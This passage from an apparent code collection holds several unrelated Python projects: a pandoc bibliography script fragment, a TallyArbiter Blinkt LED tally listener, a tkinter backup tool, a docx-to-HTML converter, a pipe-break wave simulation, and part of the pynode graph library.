+ filename_output[filename_output.find('.'):],
'\n\n')
os.rename(filename_output,
filename_output[:filename_output.find('.')]
+ '_old'
+ filename_output[filename_output.find('.'):])
pandoc_args = ' '
if standalone:
pandoc_args = ' -s -V "pagetitle:My Bibs" -V "title:My Bibs" '
pandocstring = ("pandoc "
+ pandoc_args
+ outfile_name_tex
+ " -o "
+ filename_output)
os.system(pandocstring)
os.chdir(cwd)
if __name__ == '__main__':
print('executing from command line')
``` |
{
"source": "josephdadams/TallyArbiter-Pimoroni-Blinkt-listener",
"score": 2
} |
#### File: josephdadams/TallyArbiter-Pimoroni-Blinkt-listener/tallyarbiter-pimoroni-blinkt-listener.py
```python
from signal import signal, SIGINT
from sys import exit
import sys
import time
import blinkt
import socketio
import json
device_states = []
bus_options = []
mode_preview = False
mode_program = False
if len(sys.argv) < 2:
print('Usage: tallyarbiter-pimoroni-blinkt-listener.py <server> [port] [deviceId]')
exit(1)
server = sys.argv[1]
stored_deviceId = ''
blinkt.set_clear_on_exit(True)
debounce = False #used to keep calls from happening concurrently
try:
stored_deviceId_file = open('deviceid.txt')
stored_deviceId = stored_deviceId_file.read()
stored_deviceId_file.close()
except IOError:
stored_deviceId = ''
print('Last Used Device Id: ' + stored_deviceId)
if len(sys.argv) > 2:
port = sys.argv[2]
else:
port = '4455'
if len(sys.argv) > 3:
deviceId = sys.argv[3]
else:
if (stored_deviceId != ''):
deviceId = stored_deviceId
else:
deviceId = 'null'
#SocketIO Connections
sio = socketio.Client()
@sio.event
def connect():
print('Connected to Tally Arbiter server:', server, port)
sio.emit('bus_options') # get current bus options
sio.emit('device_listen_blink', {'deviceId': deviceId}) # start listening for the device
repeatNumber = 2
while(repeatNumber):
repeatNumber = repeatNumber - 1
doBlink(0, 255, 0)
time.sleep(.3)
doBlink(0, 0, 0) #alternate with off so the green confirmation actually blinks
time.sleep(.3)
@sio.event
def connect_error(data):
print('Unable to connect to Tally Arbiter server:', server, port)
doBlink(150, 150, 150)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def disconnect():
print('Disconnected from Tally Arbiter server:', server, port)
doBlink(255, 255, 255)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.event
def reconnect():
print('Reconnected to Tally Arbiter server:', server, port)
repeatNumber = 2
while(repeatNumber):
repeatNumber = repeatNumber - 1
doBlink(0, 255, 0)
time.sleep(.3)
doBlink(0, 0, 0)
time.sleep(.3)
@sio.on('device_states')
def on_device_states(data):
global device_states
device_states = data
processTallyData()
@sio.on('bus_options')
def on_bus_options(data):
global bus_options
bus_options = data
@sio.on('flash')
def on_flash():
doBlink(255, 255, 255)
time.sleep(.5)
doBlink(0, 0, 0)
time.sleep(.5)
doBlink(255, 255, 255)
time.sleep(.5)
doBlink(0, 0, 0)
time.sleep(.5)
doBlink(255, 255, 255)
time.sleep(.5)
evaluateMode()
@sio.on('reassign')
def on_reassign(oldDeviceId, newDeviceId):
print('Reassigning from DeviceID: ' + oldDeviceId + ' to Device ID: ' + newDeviceId)
doBlink(0, 0, 0)
time.sleep(.1)
doBlink(0, 0, 255)
time.sleep(.1)
doBlink(0, 0, 0)
time.sleep(.1)
doBlink(0, 0, 255)
time.sleep(.1)
doBlink(0, 0, 0)
sio.emit('listener_reassign', data=(oldDeviceId, newDeviceId))
global deviceId
deviceId = newDeviceId
stored_deviceId_file = open('deviceid.txt', 'w')
stored_deviceId_file.write(newDeviceId)
stored_deviceId_file.close()
def getBusTypeById(busId):
for bus in bus_options:
if bus['id'] == busId:
return bus['type']
def processTallyData():
global mode_preview
global mode_program
for device_state in device_states:
if getBusTypeById(device_state['busId']) == 'preview':
if len(device_state['sources']) > 0:
mode_preview = True
else:
mode_preview = False
elif getBusTypeById(device_state['busId']) == 'program':
if len(device_state['sources']) > 0:
mode_program = True
else:
mode_program = False
evaluateMode()
def evaluateMode():
if (mode_preview == True) and (mode_program == False): # preview mode, color it green
doBlink(0, 255, 0)
elif (mode_preview == False) and (mode_program == True): # program mode, color it red
doBlink(255, 0, 0)
elif (mode_preview == True) and (mode_program == True): # preview+program mode, color it yellow
doBlink(255, 255, 0)
else: # no source, turn it off
doBlink(0, 0, 0)
def doBlink(r, g, b):
global debounce
if (debounce != True):
debounce = True
blinkt.set_all(r, g, b)
blinkt.show()
debounce = False
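# For example, doBlink(255, 0, 0) lights every LED on the Blinkt strip red,
# and doBlink(0, 0, 0) turns the strip off.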
while(1):
try:
print('Attempting to connect to Tally Arbiter server: ' + server + ' (' + port + ')')
sio.connect('http://' + server + ':' + port)
print('Tally Arbiter Listener Running. Press CTRL-C to exit.')
sio.wait()
except KeyboardInterrupt:
print('Exiting Tally Arbiter Listener.')
doBlink(0, 0, 0)
exit(0)
except socketio.exceptions.ConnectionError:
doBlink(0, 0, 0)
time.sleep(15)
except:
print("Unexpected error:", sys.exc_info()[0])
print('An error occurred internally.')
doBlink(0, 0, 0)
``` |
{
"source": "josephdaurora/simplebackup",
"score": 3
} |
#### File: josephdaurora/simplebackup/main.py
```python
from tkinter import *
from tkinter import filedialog
from shutil import copytree
def checker():
if (source is not None) and (destination is not None):
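# Note: copytree's dirs_exist_ok flag requires Python 3.8 or newer.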
Button(root, justify="center", text="Begin Copying", command=lambda: copytree(source, destination, dirs_exist_ok=True)).place(bordermode="outside", anchor="center", x=400, y=300)
def getDirectories(location):
global source
global destination
if location == "source":
source = filedialog.askdirectory()
Label(root, text=source).place(bordermode="outside", anchor="center", x=400, y=100)
if location == "destination":
destination = filedialog.askdirectory()
Label(root, text=destination).place(bordermode="outside", anchor="center", x=400, y=200)
checker()
source = None
destination = None
root = Tk()
root.title("Simple Backup")
root.geometry("800x600")
Button(root, justify="center", text="Choose Source Directory", command=lambda: getDirectories("source")).place(bordermode="outside", anchor="center", x=400, y=50)
Button(root, justify="center", text="Choose Destination Directory", command=lambda: getDirectories("destination")).place(bordermode="outside", anchor="center", x=400, y=150)
root.mainloop()
``` |
{
"source": "JosephDavidTalbot/JosephDavidTalbot.github.io",
"score": 3
} |
#### File: JosephDavidTalbot.github.io/downloads/Docx Converter.py
```python
import docx, os, time, string, unicodedata
def convertDoc(docPath):
try:
docFile = docx.Document(docPath)
except:
print("Error: invalid filepath. "+docPath+" cannot be opened.")
return
docName = os.path.splitext(docPath)[0]
htmlFile = open(docName+".html", 'w', encoding='utf-8')
para = docFile.paragraphs
for p in para:
temp = ""
if p.style == 'normal':
temp += "<p>\n"
elif p.style == 'Heading 1':
temp += "<h1>\n"
elif p.style == 'Title':
temp += "<h1>\n"
elif p.style == 'Heading 2':
temp += "<h2>\n"
elif p.style == 'Heading 3':
temp += "<h3>\n"
elif p.style == 'Heading 4':
temp += "<h4>\n"
elif p.style == 'Heading 5':
temp += "<h5>\n"
elif p.style == 'Heading 6':
temp += "<h6>\n"
# HTML defines only h1-h6, so deeper heading levels fall back to h6.
elif p.style == 'Heading 7':
temp += "<h6>\n"
elif p.style == 'Heading 8':
temp += "<h6>\n"
elif p.style == 'Heading 9':
temp += "<h6>\n"
else:
temp += "<p>\n"
for r in p.runs:
if r.bold:
temp += "<strong>"
if r.italic:
temp += "<em>"
if r.text == '':
temp += '<br/>'
else:
temp += r.text.replace("\n", "<br/>\n")
# close tags in reverse order so <strong><em>text</em></strong> nests correctly
if r.italic:
temp += "</em>"
if r.bold:
temp += "</strong>"
if p.style == 'normal':
temp += "\n</p>\n\n"
elif p.style == 'Heading 1':
temp += "\n</h1>\n\n"
elif p.style == 'Title':
temp += "\n</h1>\n\n"
elif p.style == 'Heading 2':
temp += "\n</h2>\n\n"
elif p.style == 'Heading 3':
temp += "\n</h3>\n\n"
elif p.style == 'Heading 4':
temp += "\n</h4>\n\n"
elif p.style == 'Heading 5':
temp += "\n</h5>\n\n"
elif p.style == 'Heading 6':
temp += "\n</h6>\n\n"
elif p.style == 'Heading 7':
temp += "\n</h6>\n\n"
elif p.style == 'Heading 8':
temp += "\n</h6>\n\n"
elif p.style == 'Heading 9':
temp += "\n</h6>\n\n"
else:
temp += "\n</p>\n\n"
htmlFile.write(temp)
htmlFile.close()
valid_filename_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
char_limit = 255
def clean_filename(filename, whitelist=valid_filename_chars, replace=' '):
# replace spaces
for r in replace:
filename = filename.replace(r,'_')
# keep only valid ascii chars
cleaned_filename = unicodedata.normalize('NFKD', filename).encode('ASCII', 'ignore').decode()
# keep only whitelisted chars
cleaned_filename = ''.join(c for c in cleaned_filename if c in whitelist)
if len(cleaned_filename)>char_limit:
print("Warning, filename truncated because it was over {}. Filenames may no longer be unique".format(char_limit))
return cleaned_filename[:char_limit]
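# Illustrative example (hypothetical filename):
# clean_filename('my draft: v2?.docx') returns 'my_draft_v2.docx'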
#Main
print("Please enter the filename of the document you wish to convert.")
docPath=input()
start = time.time()
print('Starting...\n\n')
convertDoc(docPath)
print('All done!')
end = time.time()
print('Elapsed time: '+(str(end - start)))
``` |
{
"source": "Joseph-Davies/VCE-algorithmics-project-2",
"score": 3
} |
#### File: Joseph-Davies/VCE-algorithmics-project-2/project_2.py
```python
from pynode.main import *
import ast
import sys
import time
from ADTs import *
#CLI flags
defaults = False
animation_speed = 1.0
time_factor = 1.0
#evaluate CLI flags
i = 0
while i < len(sys.argv):
arg = sys.argv[i]
if arg == "-defaults":
defaults = True
print("using defaults data collumns")
if arg.startswith("-animation_speed="):
animation_speed = float(arg[17:])
time_factor = animation_speed
#take the reciprocal
animation_speed = 1 / animation_speed
print("set animation speed to {0}x".format(time_factor))
i += 1
del i
node_1 = None
node_2 = None
active_edge = None
is_running = False
#references to nodes
node_clear = None
node_start = None
node_time = None
#list of sensors and nodes
sensor_nodes = list()
break_nodes = list()
#simulation variables
start_time = 0
simulation_time = 0
wave_propogation_pqueue = priority_queue()
time_node_value = -1
#reset all selected nodes
def reset():
global node_1, node_2, active_edge
if node_1 in sensor_nodes:
node_1.set_color(Color(150, 50, 150))
elif node_1 in break_nodes:
node_1.set_color(Color(50, 100, 200))
else:
node_1.set_color(Color.DARK_GREY)
if node_2 in sensor_nodes:
node_2.set_color(Color(150, 50, 150))
elif node_2 in break_nodes:
node_2.set_color(Color(50, 100, 200))
else:
node_2.set_color(Color.DARK_GREY)
if active_edge is not None:
active_edge.set_color(Color.LIGHT_GREY)
node_1 = None
node_2 = None
active_edge = None
#convert a value to a float if possible, otherwise return None
def is_float(posible_int):
output = None
try:
output = float(posible_int)
except:
output = None
return output
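# e.g. is_float('3.5') returns 3.5, while is_float('abc') returns None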
#function to get the user's input
def prompt(request_length = False, request_time = False):
first = None
second = None
third = None
#ask the user whether they want to add a break or a sensor
while True:
print("What would you like to do:")
input_1 = input("Add a break (b), add a sensor (s), cancel (c): ").lower().rstrip()
if input_1 == "b":
first = input_1
break
elif input_1 == "s":
first = input_1
break
elif input_1 == "c":
return (None, None, None)
else:
print("Invalid Input")
#ask the user how far from the first node they clicked they want the new node to be
if request_length:
while True:
input_2 = is_float(input("How far along the pipe do you want to add it in meters: ").lower().rstrip())
if input_2 != None:
second = input_2
break
else:
print("Invalid Input")
#ask the user when they want a break to occur
if request_time and first == "b":
while True:
input_3 = is_float(input("At what time does the break happen: ").lower().rstrip())
if input_3 != None:
third = input_3
break
else:
print("Invalid Input")
return (first, second, third)
def on_click(node):
global node_1, node_2, active_edge, is_running
print("Clicked on node \"{}\"".format(node.id()))
#start node
if node is node_start and not is_running:
is_running = True
simulate()
return
#disable user input if the application is running
if not is_running:
#clear selection node
if node is node_clear:
reset()
return
#if both nodes have been selected and you select a third reset the selection
if node_1 is not None and node_2 is not None:
reset()
#if node 1 has not been selected select it
if node_1 is None:
node_1 = node
node_1.set_color(Color.YELLOW)
#if node 1 has been selected and node 2 has not been selected select node 2
elif node_2 is None:
node_2 = node
node_2.set_color(Color.GREEN)
#if the two selected nodes are different highlight the edge between them
if node_1 is not None and node_2 is not None and node_1 is not node_2:
try:
active_edge = graph.edges_between(node_1, node_2)[0]
active_edge.set_color(Color.BLUE)
except Exception as e:
print("Cannot find edge between selected nodes")
print(e)
return
#if both nodes have been selected ask the user what to do
if node_1 is not None and node_2 is not None:
#ask the user for what they want to do
#if the two nodes are different ask for the edge between them
if active_edge is not None:
new_thing_type, new_thing_length, new_thing_time = prompt(True, True)
#if the two nodes are the same then don't ask the for the edge
else:
new_thing_type, new_thing_length, new_thing_time = prompt(False, True)
#if nothing is got from the user then just reset
if new_thing_type is None and new_thing_length is None:
reset()
return
#if a length is specified aka the new node is between nodes
if new_thing_length != None:
#break
if new_thing_type == "b":
#add the node
new_node = graph.add_node("Break: " + str(len(break_nodes) + 1))
new_node.set_color(Color(50, 100, 200))
new_node.set_attribute("time", new_thing_time)
#calculate the new edge lengths, rounding to avoid floating-point errors
length_1 = round(new_thing_length, 1)
length_2 = round(active_edge.weight() - new_thing_length, 1)
#add the edges
new_edge_1 = graph.add_edge(node_1, new_node)
new_edge_1.set_weight(length_1)
new_edge_1.set_attribute("length", length_1)
new_edge_1.set_attribute("inner radius", active_edge.attribute("inner radius"))
new_edge_1.set_attribute("speed", active_edge.attribute("speed"))
new_edge_2 = graph.add_edge(new_node, node_2)
new_edge_2.set_weight(length_2)
new_edge_2.set_attribute("length", length_2)
new_edge_2.set_attribute("inner radius", active_edge.attribute("inner radius"))
new_edge_2.set_attribute("speed", active_edge.attribute("speed"))
#remove the old edge
graph.remove_edge(active_edge)
active_edge = None
#record the break node
break_nodes.append(new_node)
#sensor
elif new_thing_type == "s":
#add the node
new_node = graph.add_node("Sensor: " + str(len(sensor_nodes) + 1))
new_node.set_color(Color(150, 50, 150))
#calculate the new edge lengths, rounding to avoid floating-point errors
length_1 = round(new_thing_length, 1)
length_2 = round(active_edge.weight() - new_thing_length, 1)
#add the edges
new_edge_1 = graph.add_edge(node_1, new_node)
new_edge_1.set_weight(length_1)
new_edge_1.set_attribute("length", length_1)
new_edge_1.set_attribute("inner radius", active_edge.attribute("inner radius"))
new_edge_1.set_attribute("speed", active_edge.attribute("speed"))
new_edge_2 = graph.add_edge(new_node, node_2)
new_edge_2.set_weight(length_2)
new_edge_2.set_attribute("length", length_2)
new_edge_2.set_attribute("inner radius", active_edge.attribute("inner radius"))
new_edge_2.set_attribute("speed", active_edge.attribute("speed"))
#remove the old edge
graph.remove_edge(active_edge)
active_edge = None
#record the break node
sensor_nodes.append(new_node)
#if no length is specified aka the break is being placed over another node
else:
#break
if new_thing_type == "b":
#record all the surrounding nodes and edge weights
things_to_reconect_to = list()
for edge in node_1.incident_edges():
things_to_reconect_to.append((edge.other_node(node_1), edge.weight(), edge.attribute("speed"), edge.attribute("inner radius")))
#remove the current node
graph.remove_node(node_1)
#add the new node
new_node = graph.add_node("Break: " + str(len(break_nodes) + 1))
new_node.set_color(Color(50, 100, 200))
new_node.set_attribute("time", new_thing_time)
#reconnect the node to its surroundings
for thing in things_to_reconect_to:
node_to_conect_to, weight, wave_speed, pipe_i_radius = thing
new_edge = graph.add_edge(new_node, node_to_conect_to)
new_edge.set_weight(weight)
new_edge.set_attribute("length", weight)
new_edge.set_attribute("inner radius", pipe_i_radius)
new_edge.set_attribute("speed", wave_speed)
#record the break node
break_nodes.append(new_node)
elif new_thing_type == "s":
#record all the surrounding nodes and edge weights
things_to_reconect_to = list()
for edge in node_1.incident_edges():
things_to_reconect_to.append((edge.other_node(node_1), edge.weight(), edge.attribute("speed"), edge.attribute("inner radius")))
#remove the current node
graph.remove_node(node_1)
#add the new node
new_node = graph.add_node("Sensor: " + str(len(sensor_nodes) + 1))
new_node.set_color(Color(150, 50, 150))
#reconnect the node to its surroundings
for thing in things_to_reconect_to:
node_to_conect_to, weight, wave_speed, pipe_i_radius = thing
new_edge = graph.add_edge(new_node, node_to_conect_to)
new_edge.set_weight(weight)
new_edge.set_attribute("length", weight)
new_edge.set_attribute("inner radius", pipe_i_radius)
new_edge.set_attribute("speed", wave_speed)
#record the sensor node
sensor_nodes.append(new_node)
def simulate():
global start_time, wave_propogation_pqueue
print("starting simulation")
#put the breaks into a priority queue of when they will trigger
#set the node they came from to 0 because they are sources
for node in break_nodes:
wave_propogation_pqueue.enqueue((node, None), node.attribute("time"))
start_time = time.time()
print("start time", start_time)
print("====================================================")
should_continue = True
while should_continue:
should_continue = simulation_itteration()
def simulation_itteration():
global simulation_time, node_time, time_node_value
simulation_time = time.time() - start_time
simulation_time *= time_factor
t_node_val = round(simulation_time, 1)
if t_node_val != time_node_value:
node_time.set_value("t={0}".format(t_node_val))
time_node_value = t_node_val
#if there is nothing left in the queue signal to stop iterating
if wave_propogation_pqueue.length() == 0: return False
hit_time = wave_propogation_pqueue.front_priority()
if simulation_time > hit_time:
node, node_from = wave_propogation_pqueue.dequeue()
if node in sensor_nodes:
print("hit {0} at {1}".format(node.id(), simulation_time))
#n_to = node.id()
#n_from = node_from.id() if node_from is not None else "No node"
#print("{0} -> {1}".format(n_from, n_to))
#print("@ {0}".format(hit_time))
#print("----------------------------------------------------")
for edge in node.incident_edges():
other_node = edge.other_node(node)
if other_node is node_from: continue
#time in seconds for the wave to move along the pipe
wave_time = edge.attribute("length") / edge.attribute("speed")
#convert to miliseconds
wave_time_ms = wave_time * 1000
#multiply by animation time
wave_time_ms *= animation_speed
edge.traverse(node, Color.RED, True, wave_time_ms)
thing_to_enqueue = (other_node, node)
wave_propogation_pqueue.enqueue(thing_to_enqueue, hit_time + wave_time)
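#e.g. (illustrative numbers) a 100 m pipe with a wave speed of 1000 m/s
#enqueues the far node 0.1 s of simulation time after hit_time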
#continue to the next iteration
return True
nodes = dict()
#if the node does not exist make it; either way return a reference to it
def get_node(name):
if name in nodes:
return nodes[name]
else:
node = graph.add_node(name)
nodes[name] = node
return node
#if the edge does not exist make it and return it; if it does exist return it
#if the edge involves nodes that do not exist make them
def get_edge(node_1, node_2):
if graph.adjacent(get_node(node_1), get_node(node_2)):
return graph.edges_between(get_node(node_1), get_node(node_2))[0]
else:
edge = graph.add_edge(get_node(node_1), get_node(node_2))
return edge
def run():
global node_clear, node_start, node_time
#user interface nodes
node_clear = graph.add_node("Clear")
node_clear.set_color(Color.RED)
node_clear.set_position(50, 480)
node_start = graph.add_node("Start")
node_start.set_color(Color.RED)
node_start.set_position(100, 480)
node_time = graph.add_node("t=0")
node_time.set_color(Color.BLACK)
node_time.set_position(150, 480)
length_index = 2
diameter_index = 3
thickness_index = 7
speed_index = 10
#if the user does not specify the -defaults flag then ask them which columns to read the data from
if not defaults:
length_index = int(input("Which column is the length in: "))
diameter_index = int(input("Which column is the diameter in: "))
thickness_index = int(input("Which column is the thickness in: "))
speed_index = int(input("Which column is the speed in: "))
#construct the graph
with open("pipes.csv", 'r') as csv_file:
first = True
for line in csv_file:
#if it is the first line ignore it as it is the header
if first:
first = False
continue
#split the data into columns
data = line.strip().replace("\t", "").split(',')
#where possible evaluate literals
i = 0
while i < len(data):
try:
data[i] = ast.literal_eval(data[i])
i += 1
except:
i += 1
#get the edge between the two nodes in the line
#if the edge does not exist create it
#if either of the nodes do not exist create them
e = get_edge(data[0], data[1])
#set the values of the edge
e.set_weight(data[length_index])
e.set_attribute("length", data[length_index])
e.set_attribute("inner radius", (data[diameter_index] - 2 * data[thickness_index]) / 2)
e.set_attribute("speed", data[speed_index])
register_click_listener(on_click)
begin_pynode(run)
```
#### File: pynode/src/pynode_graphlib.py
```python
from pynode.src import pynode_core
import random
def pause(time):
pynode_core.add_event(pynode_core.EventPause(time))
def delay(func, time, args=[], repeat=False):
def execute():
pynode_core.execute_function(func, args)
if repeat:
delay_id = pynode_core.timer.set_interval(execute, time)
pynode_core.PynodeCoreGlobals.delay_type[delay_id] = 1
return delay_id
else:
delay_id = pynode_core.timer.set_timeout(execute, time)
pynode_core.PynodeCoreGlobals.delay_type[delay_id] = 0
return delay_id
def cancel_delay(delay_id):
if delay_id in pynode_core.PynodeCoreGlobals.delay_type:
if pynode_core.PynodeCoreGlobals.delay_type[delay_id] == 1: pynode_core.timer.clear_interval(delay_id)
else: pynode_core.timer.clear_timeout(delay_id)
del pynode_core.PynodeCoreGlobals.delay_type[delay_id]
def clear_delays():
delay_ids = list(pynode_core.PynodeCoreGlobals.delay_type.keys())
for delay_id in delay_ids:
cancel_delay(delay_id)
def print_debug(value):
pynode_core.do_print(str(value) + "\n")
def register_click_listener(func):
pynode_core.PynodeCoreGlobals.click_listener_func["f"] = func
class Color:
def __init__(self, red, green, blue, transparent=False):
self._red = red; self._green = green; self._blue = blue
self._transparent = transparent
@staticmethod
def rgb(red, green, blue):
return Color(red, green, blue)
def hex_string(self):
if self._transparent: return "transparent"
else: return "#%02x%02x%02x" % (self._red, self._green, self._blue)
def __str__(self):
return "(" + str(self._red) + "," + str(self._green) + "," + str(self._blue) + ")"
def red(self): return self._red
def green(self): return self._green
def blue(self): return self._blue
Color.RED = Color(180, 0, 0)
Color.GREEN = Color(0, 150, 0)
Color.BLUE = Color(0, 0, 200)
Color.YELLOW = Color(255, 215, 0)
Color.WHITE = Color(255, 255, 255)
Color.LIGHT_GREY = Color(199, 199, 199)
Color.GREY = Color(127, 127, 127)
Color.DARK_GREY = Color(82, 82, 82)
Color.BLACK = Color(0, 0, 0)
Color.TRANSPARENT = Color(0, 0, 0, True)
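# For example, Color(255, 215, 0).hex_string() returns '#ffd700' (the YELLOW constant above).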
class CustomStyle:
def __init__(self, size, color, outline=Color.TRANSPARENT):
self._size = size
self._color = color
self._outline = outline
self._has_outline = outline is not None
def data(self, element):
return str(self._size) + "," + self._color.hex_string() + "," + (element._color.hex_string() if self._outline is None else self._outline.hex_string()) + "," + str(self._has_outline)
class Node:
def __init__(self, *args, **kwds):
arg_id = kwds["id"] if "id" in kwds else args[0] if len(args) > 0 else pynode_core.next_user_id()
arg_value = kwds["value"] if "value" in kwds else args[1] if len(args) > 1 else arg_id
self._id = arg_id
self._value = arg_value
self._incident_edges = []
self._attributes = {}
self._priority = 0
self._position = None
self._is_pos_relative = False
self._labels = ["", ""]
self._size = 12
self._color = Color.DARK_GREY
self._value_style = CustomStyle(13, Color.WHITE, None)
self._label_styles = [CustomStyle(10, Color.GREY), CustomStyle(10, Color.GREY)]
self._internal_id = pynode_core.next_global_id()
def set_value(self, value):
self._value = value
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_value, [self._internal_id, str(value) if value is not None else ""]), self)
return self
def value(self):
return self._value
def incident_edges(self):
return list(self._incident_edges)
def incoming_edges(self):
return [e for e in self._incident_edges if not e._directed or e._target == self]
def outgoing_edges(self):
return [e for e in self._incident_edges if not e._directed or e._source == self]
def adjacent_nodes(self):
return [e._source if e._target is self else e._target for e in self._incident_edges]
def predecessor_nodes(self):
return [e._source if e._target is self else e._target for e in self.incoming_edges()]
def successor_nodes(self):
return [e._source if e._target is self else e._target for e in self.outgoing_edges()]
def degree(self): return len(self._incident_edges)
def indegree(self): return len(self.incoming_edges())
def outdegree(self): return len(self.outgoing_edges())
def set_attribute(self, name, value):
self._attributes[name] = value
return self
def attribute(self, name):
return self._attributes[name] if name in self._attributes else None
def set_priority(self, value):
self._priority = value
return self
def priority(self):
return self._priority
def set_position(self, x, y=None, relative=False):
self._position = [x, y]
if x is None or y is None: self._position = None
self._is_pos_relative = relative
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_position, [self._internal_id, x, y, relative]), self)
return self
# Note: Function should be used asynchronously in the online version. Call it in delayed and/or click listener functions.
def position(self):
data = pynode_core.get_data((pynode_core.Event(pynode_core.js_node_get_position, [self._internal_id])))
if graph.has_node(self) and data is not None and data[0] is not None and data[1] is not None:
return int(data[0]), int(data[1])
elif self._position is None: return None
else:
if self._is_pos_relative and data is not None and data[2] is not None and data[3] is not None:
return int(self._position[0] * data[2]), int(self._position[1] * data[3])
else: return int(self._position[0]), int(self._position[1])
def set_label(self, text, label_id=0):
self._labels[label_id] = text
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_label, [self._internal_id, str(text) if text is not None else "", label_id]), self)
return self
def label(self, label_id=0):
return self._labels[label_id]
def set_size(self, size):
self._size = size
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_size, [self._internal_id, size]), self)
return self
def size(self): return self._size
def set_color(self, color):
self._color = color
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_color, [self._internal_id, color.hex_string(), self._value_style.data(self)]), self)
return self
def color(self): return self._color
def set_text_size(self, size):
self._value_style._size = size
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_value_style, [self._internal_id, self._value_style.data(self)]), self)
return self
def set_text_color(self, color):
self._value_style._color = color
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_value_style, [self._internal_id, self._value_style.data(self)]), self)
return self
def set_value_style(self, size=None, color=None, outline=-1):
self._value_style = CustomStyle(self._value_style._size if size is None else size, self._value_style._color if color is None else color, self._value_style._outline if outline == -1 else outline)
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_value_style, [self._internal_id, self._value_style.data(self)]), self)
return self
def set_label_style(self, size=None, color=None, outline=None, label_id=None):
if label_id is None or (label_id != 0 and label_id != 1):
style1 = CustomStyle(self._label_styles[0]._size if size is None else size, self._label_styles[0]._color if color is None else color, self._label_styles[0]._outline if outline is None else outline)
style2 = CustomStyle(self._label_styles[1]._size if size is None else size, self._label_styles[1]._color if color is None else color, self._label_styles[1]._outline if outline is None else outline)
self._label_styles[0] = style1
self._label_styles[1] = style2
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_label_style, [self._internal_id, self._label_styles[0].data(self), 0]), self)
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_label_style, [self._internal_id, self._label_styles[1].data(self), 1]), self)
else:
style = CustomStyle(self._label_styles[label_id]._size if size is None else size,Color.WHITE if color is None else color, outline)
self._label_styles[label_id] = style
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_set_label_style, [self._internal_id, self._label_styles[label_id].data(self), label_id]), self)
return self
def highlight(self, *args, **kwds):
arg_color = kwds["color"] if "color" in kwds else args[0] if len(args) > 0 else None
arg_size = kwds["size"] if "size" in kwds else args[1] if len(args) > 1 else self._size * 1.5
pynode_core.add_event(pynode_core.Event(pynode_core.js_node_highlight, [self._internal_id, arg_size, arg_color.hex_string() if arg_color is not None else None]), self)
def id(self):
return self._id
def _data(self):
d = {"id": self._internal_id, "label": str(self._value) if self._value is not None else "", "labelStyle": self._value_style.data(self), "topRightLabel": str(self._labels[0]) if self._labels[0] is not None else "", "topLeftLabel": str(self._labels[1]) if self._labels[1] is not None else "", "topRightLabelStyle": self._label_styles[0].data(self), "topLeftLabelStyle": self._label_styles[1].data(self), "r": self._size, "color": self._color.hex_string(), "fixed": (self._position is not None), "static": (self._position is not None), "ax": 0, "ay": 0, "rx": 0.0, "ry": 0.0, "relativePosition": False}
if self._position is not None:
if self._is_pos_relative:
d["relativePosition"] = True
d["rx"] = self._position[0]; d["ry"] = self._position[1]
else:
d["ax"] = self._position[0]; d["ay"] = self._position[1]
d["x"] = self._position[0]; d["y"] = self._position[1]
return d
def __lt__(self, other): return self._priority < other._priority if isinstance(other, Node) else NotImplemented
def __le__(self, other): return self._priority <= other._priority if isinstance(other, Node) else NotImplemented
def __gt__(self, other): return self._priority > other._priority if isinstance(other, Node) else NotImplemented
def __ge__(self, other): return self._priority >= other._priority if isinstance(other, Node) else NotImplemented
def __str__(self):
return str(self._id)
def __repr__(self):
return "node({0})".format(str(self._id))
class Edge:
def __init__(self, source, target, weight=None, directed=False):
self._source = source
self._target = target
self._weight = weight
self._directed = directed
self._attributes = {}
self._priority = 0
self._width = 2
self._color = Color.LIGHT_GREY
self._weight_style = CustomStyle(10, Color.GREY)
self._internal_id = pynode_core.next_global_id()
def source(self, target=None):
# Deprecated
if target is not None: return self.other_node(target)
return self._source
def target(self, source=None):
# Deprecated
if source is not None: return self.other_node(source)
return self._target
def set_weight(self, weight=None):
self._weight = weight
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_weight, [self._internal_id, str(weight) if weight is not None else ""]), self)
return self
def weight(self):
return self._weight
def set_directed(self, directed=True):
self._directed = directed
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_directed, [self._internal_id, self._directed]), self)
return self
def directed(self):
return self._directed
def other_node(self, node):
return self._target if (self._source is node or self._source._id == node) else self._source
def set_attribute(self, name, value):
self._attributes[name] = value
return self
def attribute(self, name):
return self._attributes[name] if name in self._attributes else None
def set_priority(self, value):
self._priority = value
return self
def priority(self):
return self._priority
def set_width(self, width=2):
self._width = width
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_width, [self._internal_id, width]), self)
return self
def width(self): return self._width
def set_color(self, color=Color.LIGHT_GREY):
self._color = color
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_color, [self._internal_id, color.hex_string()]), self)
return self
def color(self): return self._color
def set_weight_style(self, size=None, color=None, outline=None):
self._weight_style = CustomStyle(self._weight_style._size if size is None else size, self._weight_style._color if color is None else color, self._weight_style._outline if outline is None else outline)
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_set_weight_style, [self._internal_id, self._weight_style.data(self)]), self)
return self
def highlight(self, *args, **kwds):
arg_color = kwds["color"] if "color" in kwds else args[0] if len(args) > 0 else None
arg_width = kwds["width"] if "width" in kwds else args[1] if len(args) > 1 else self._width * 2
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_highlight, [self._internal_id, arg_width, arg_color.hex_string() if arg_color is not None else None]), self)
def traverse(self, initial_node=None, color=Color.RED, keep_path=True, length = 1.0):
if not graph.has_edge(self): return
start = graph.node(initial_node) if initial_node is not None else self._source
if not graph.has_node(start): return
pynode_core.add_event(pynode_core.Event(pynode_core.js_edge_traverse, [self._internal_id, start._internal_id, color.hex_string(), keep_path, length]), self)
def _data(self):
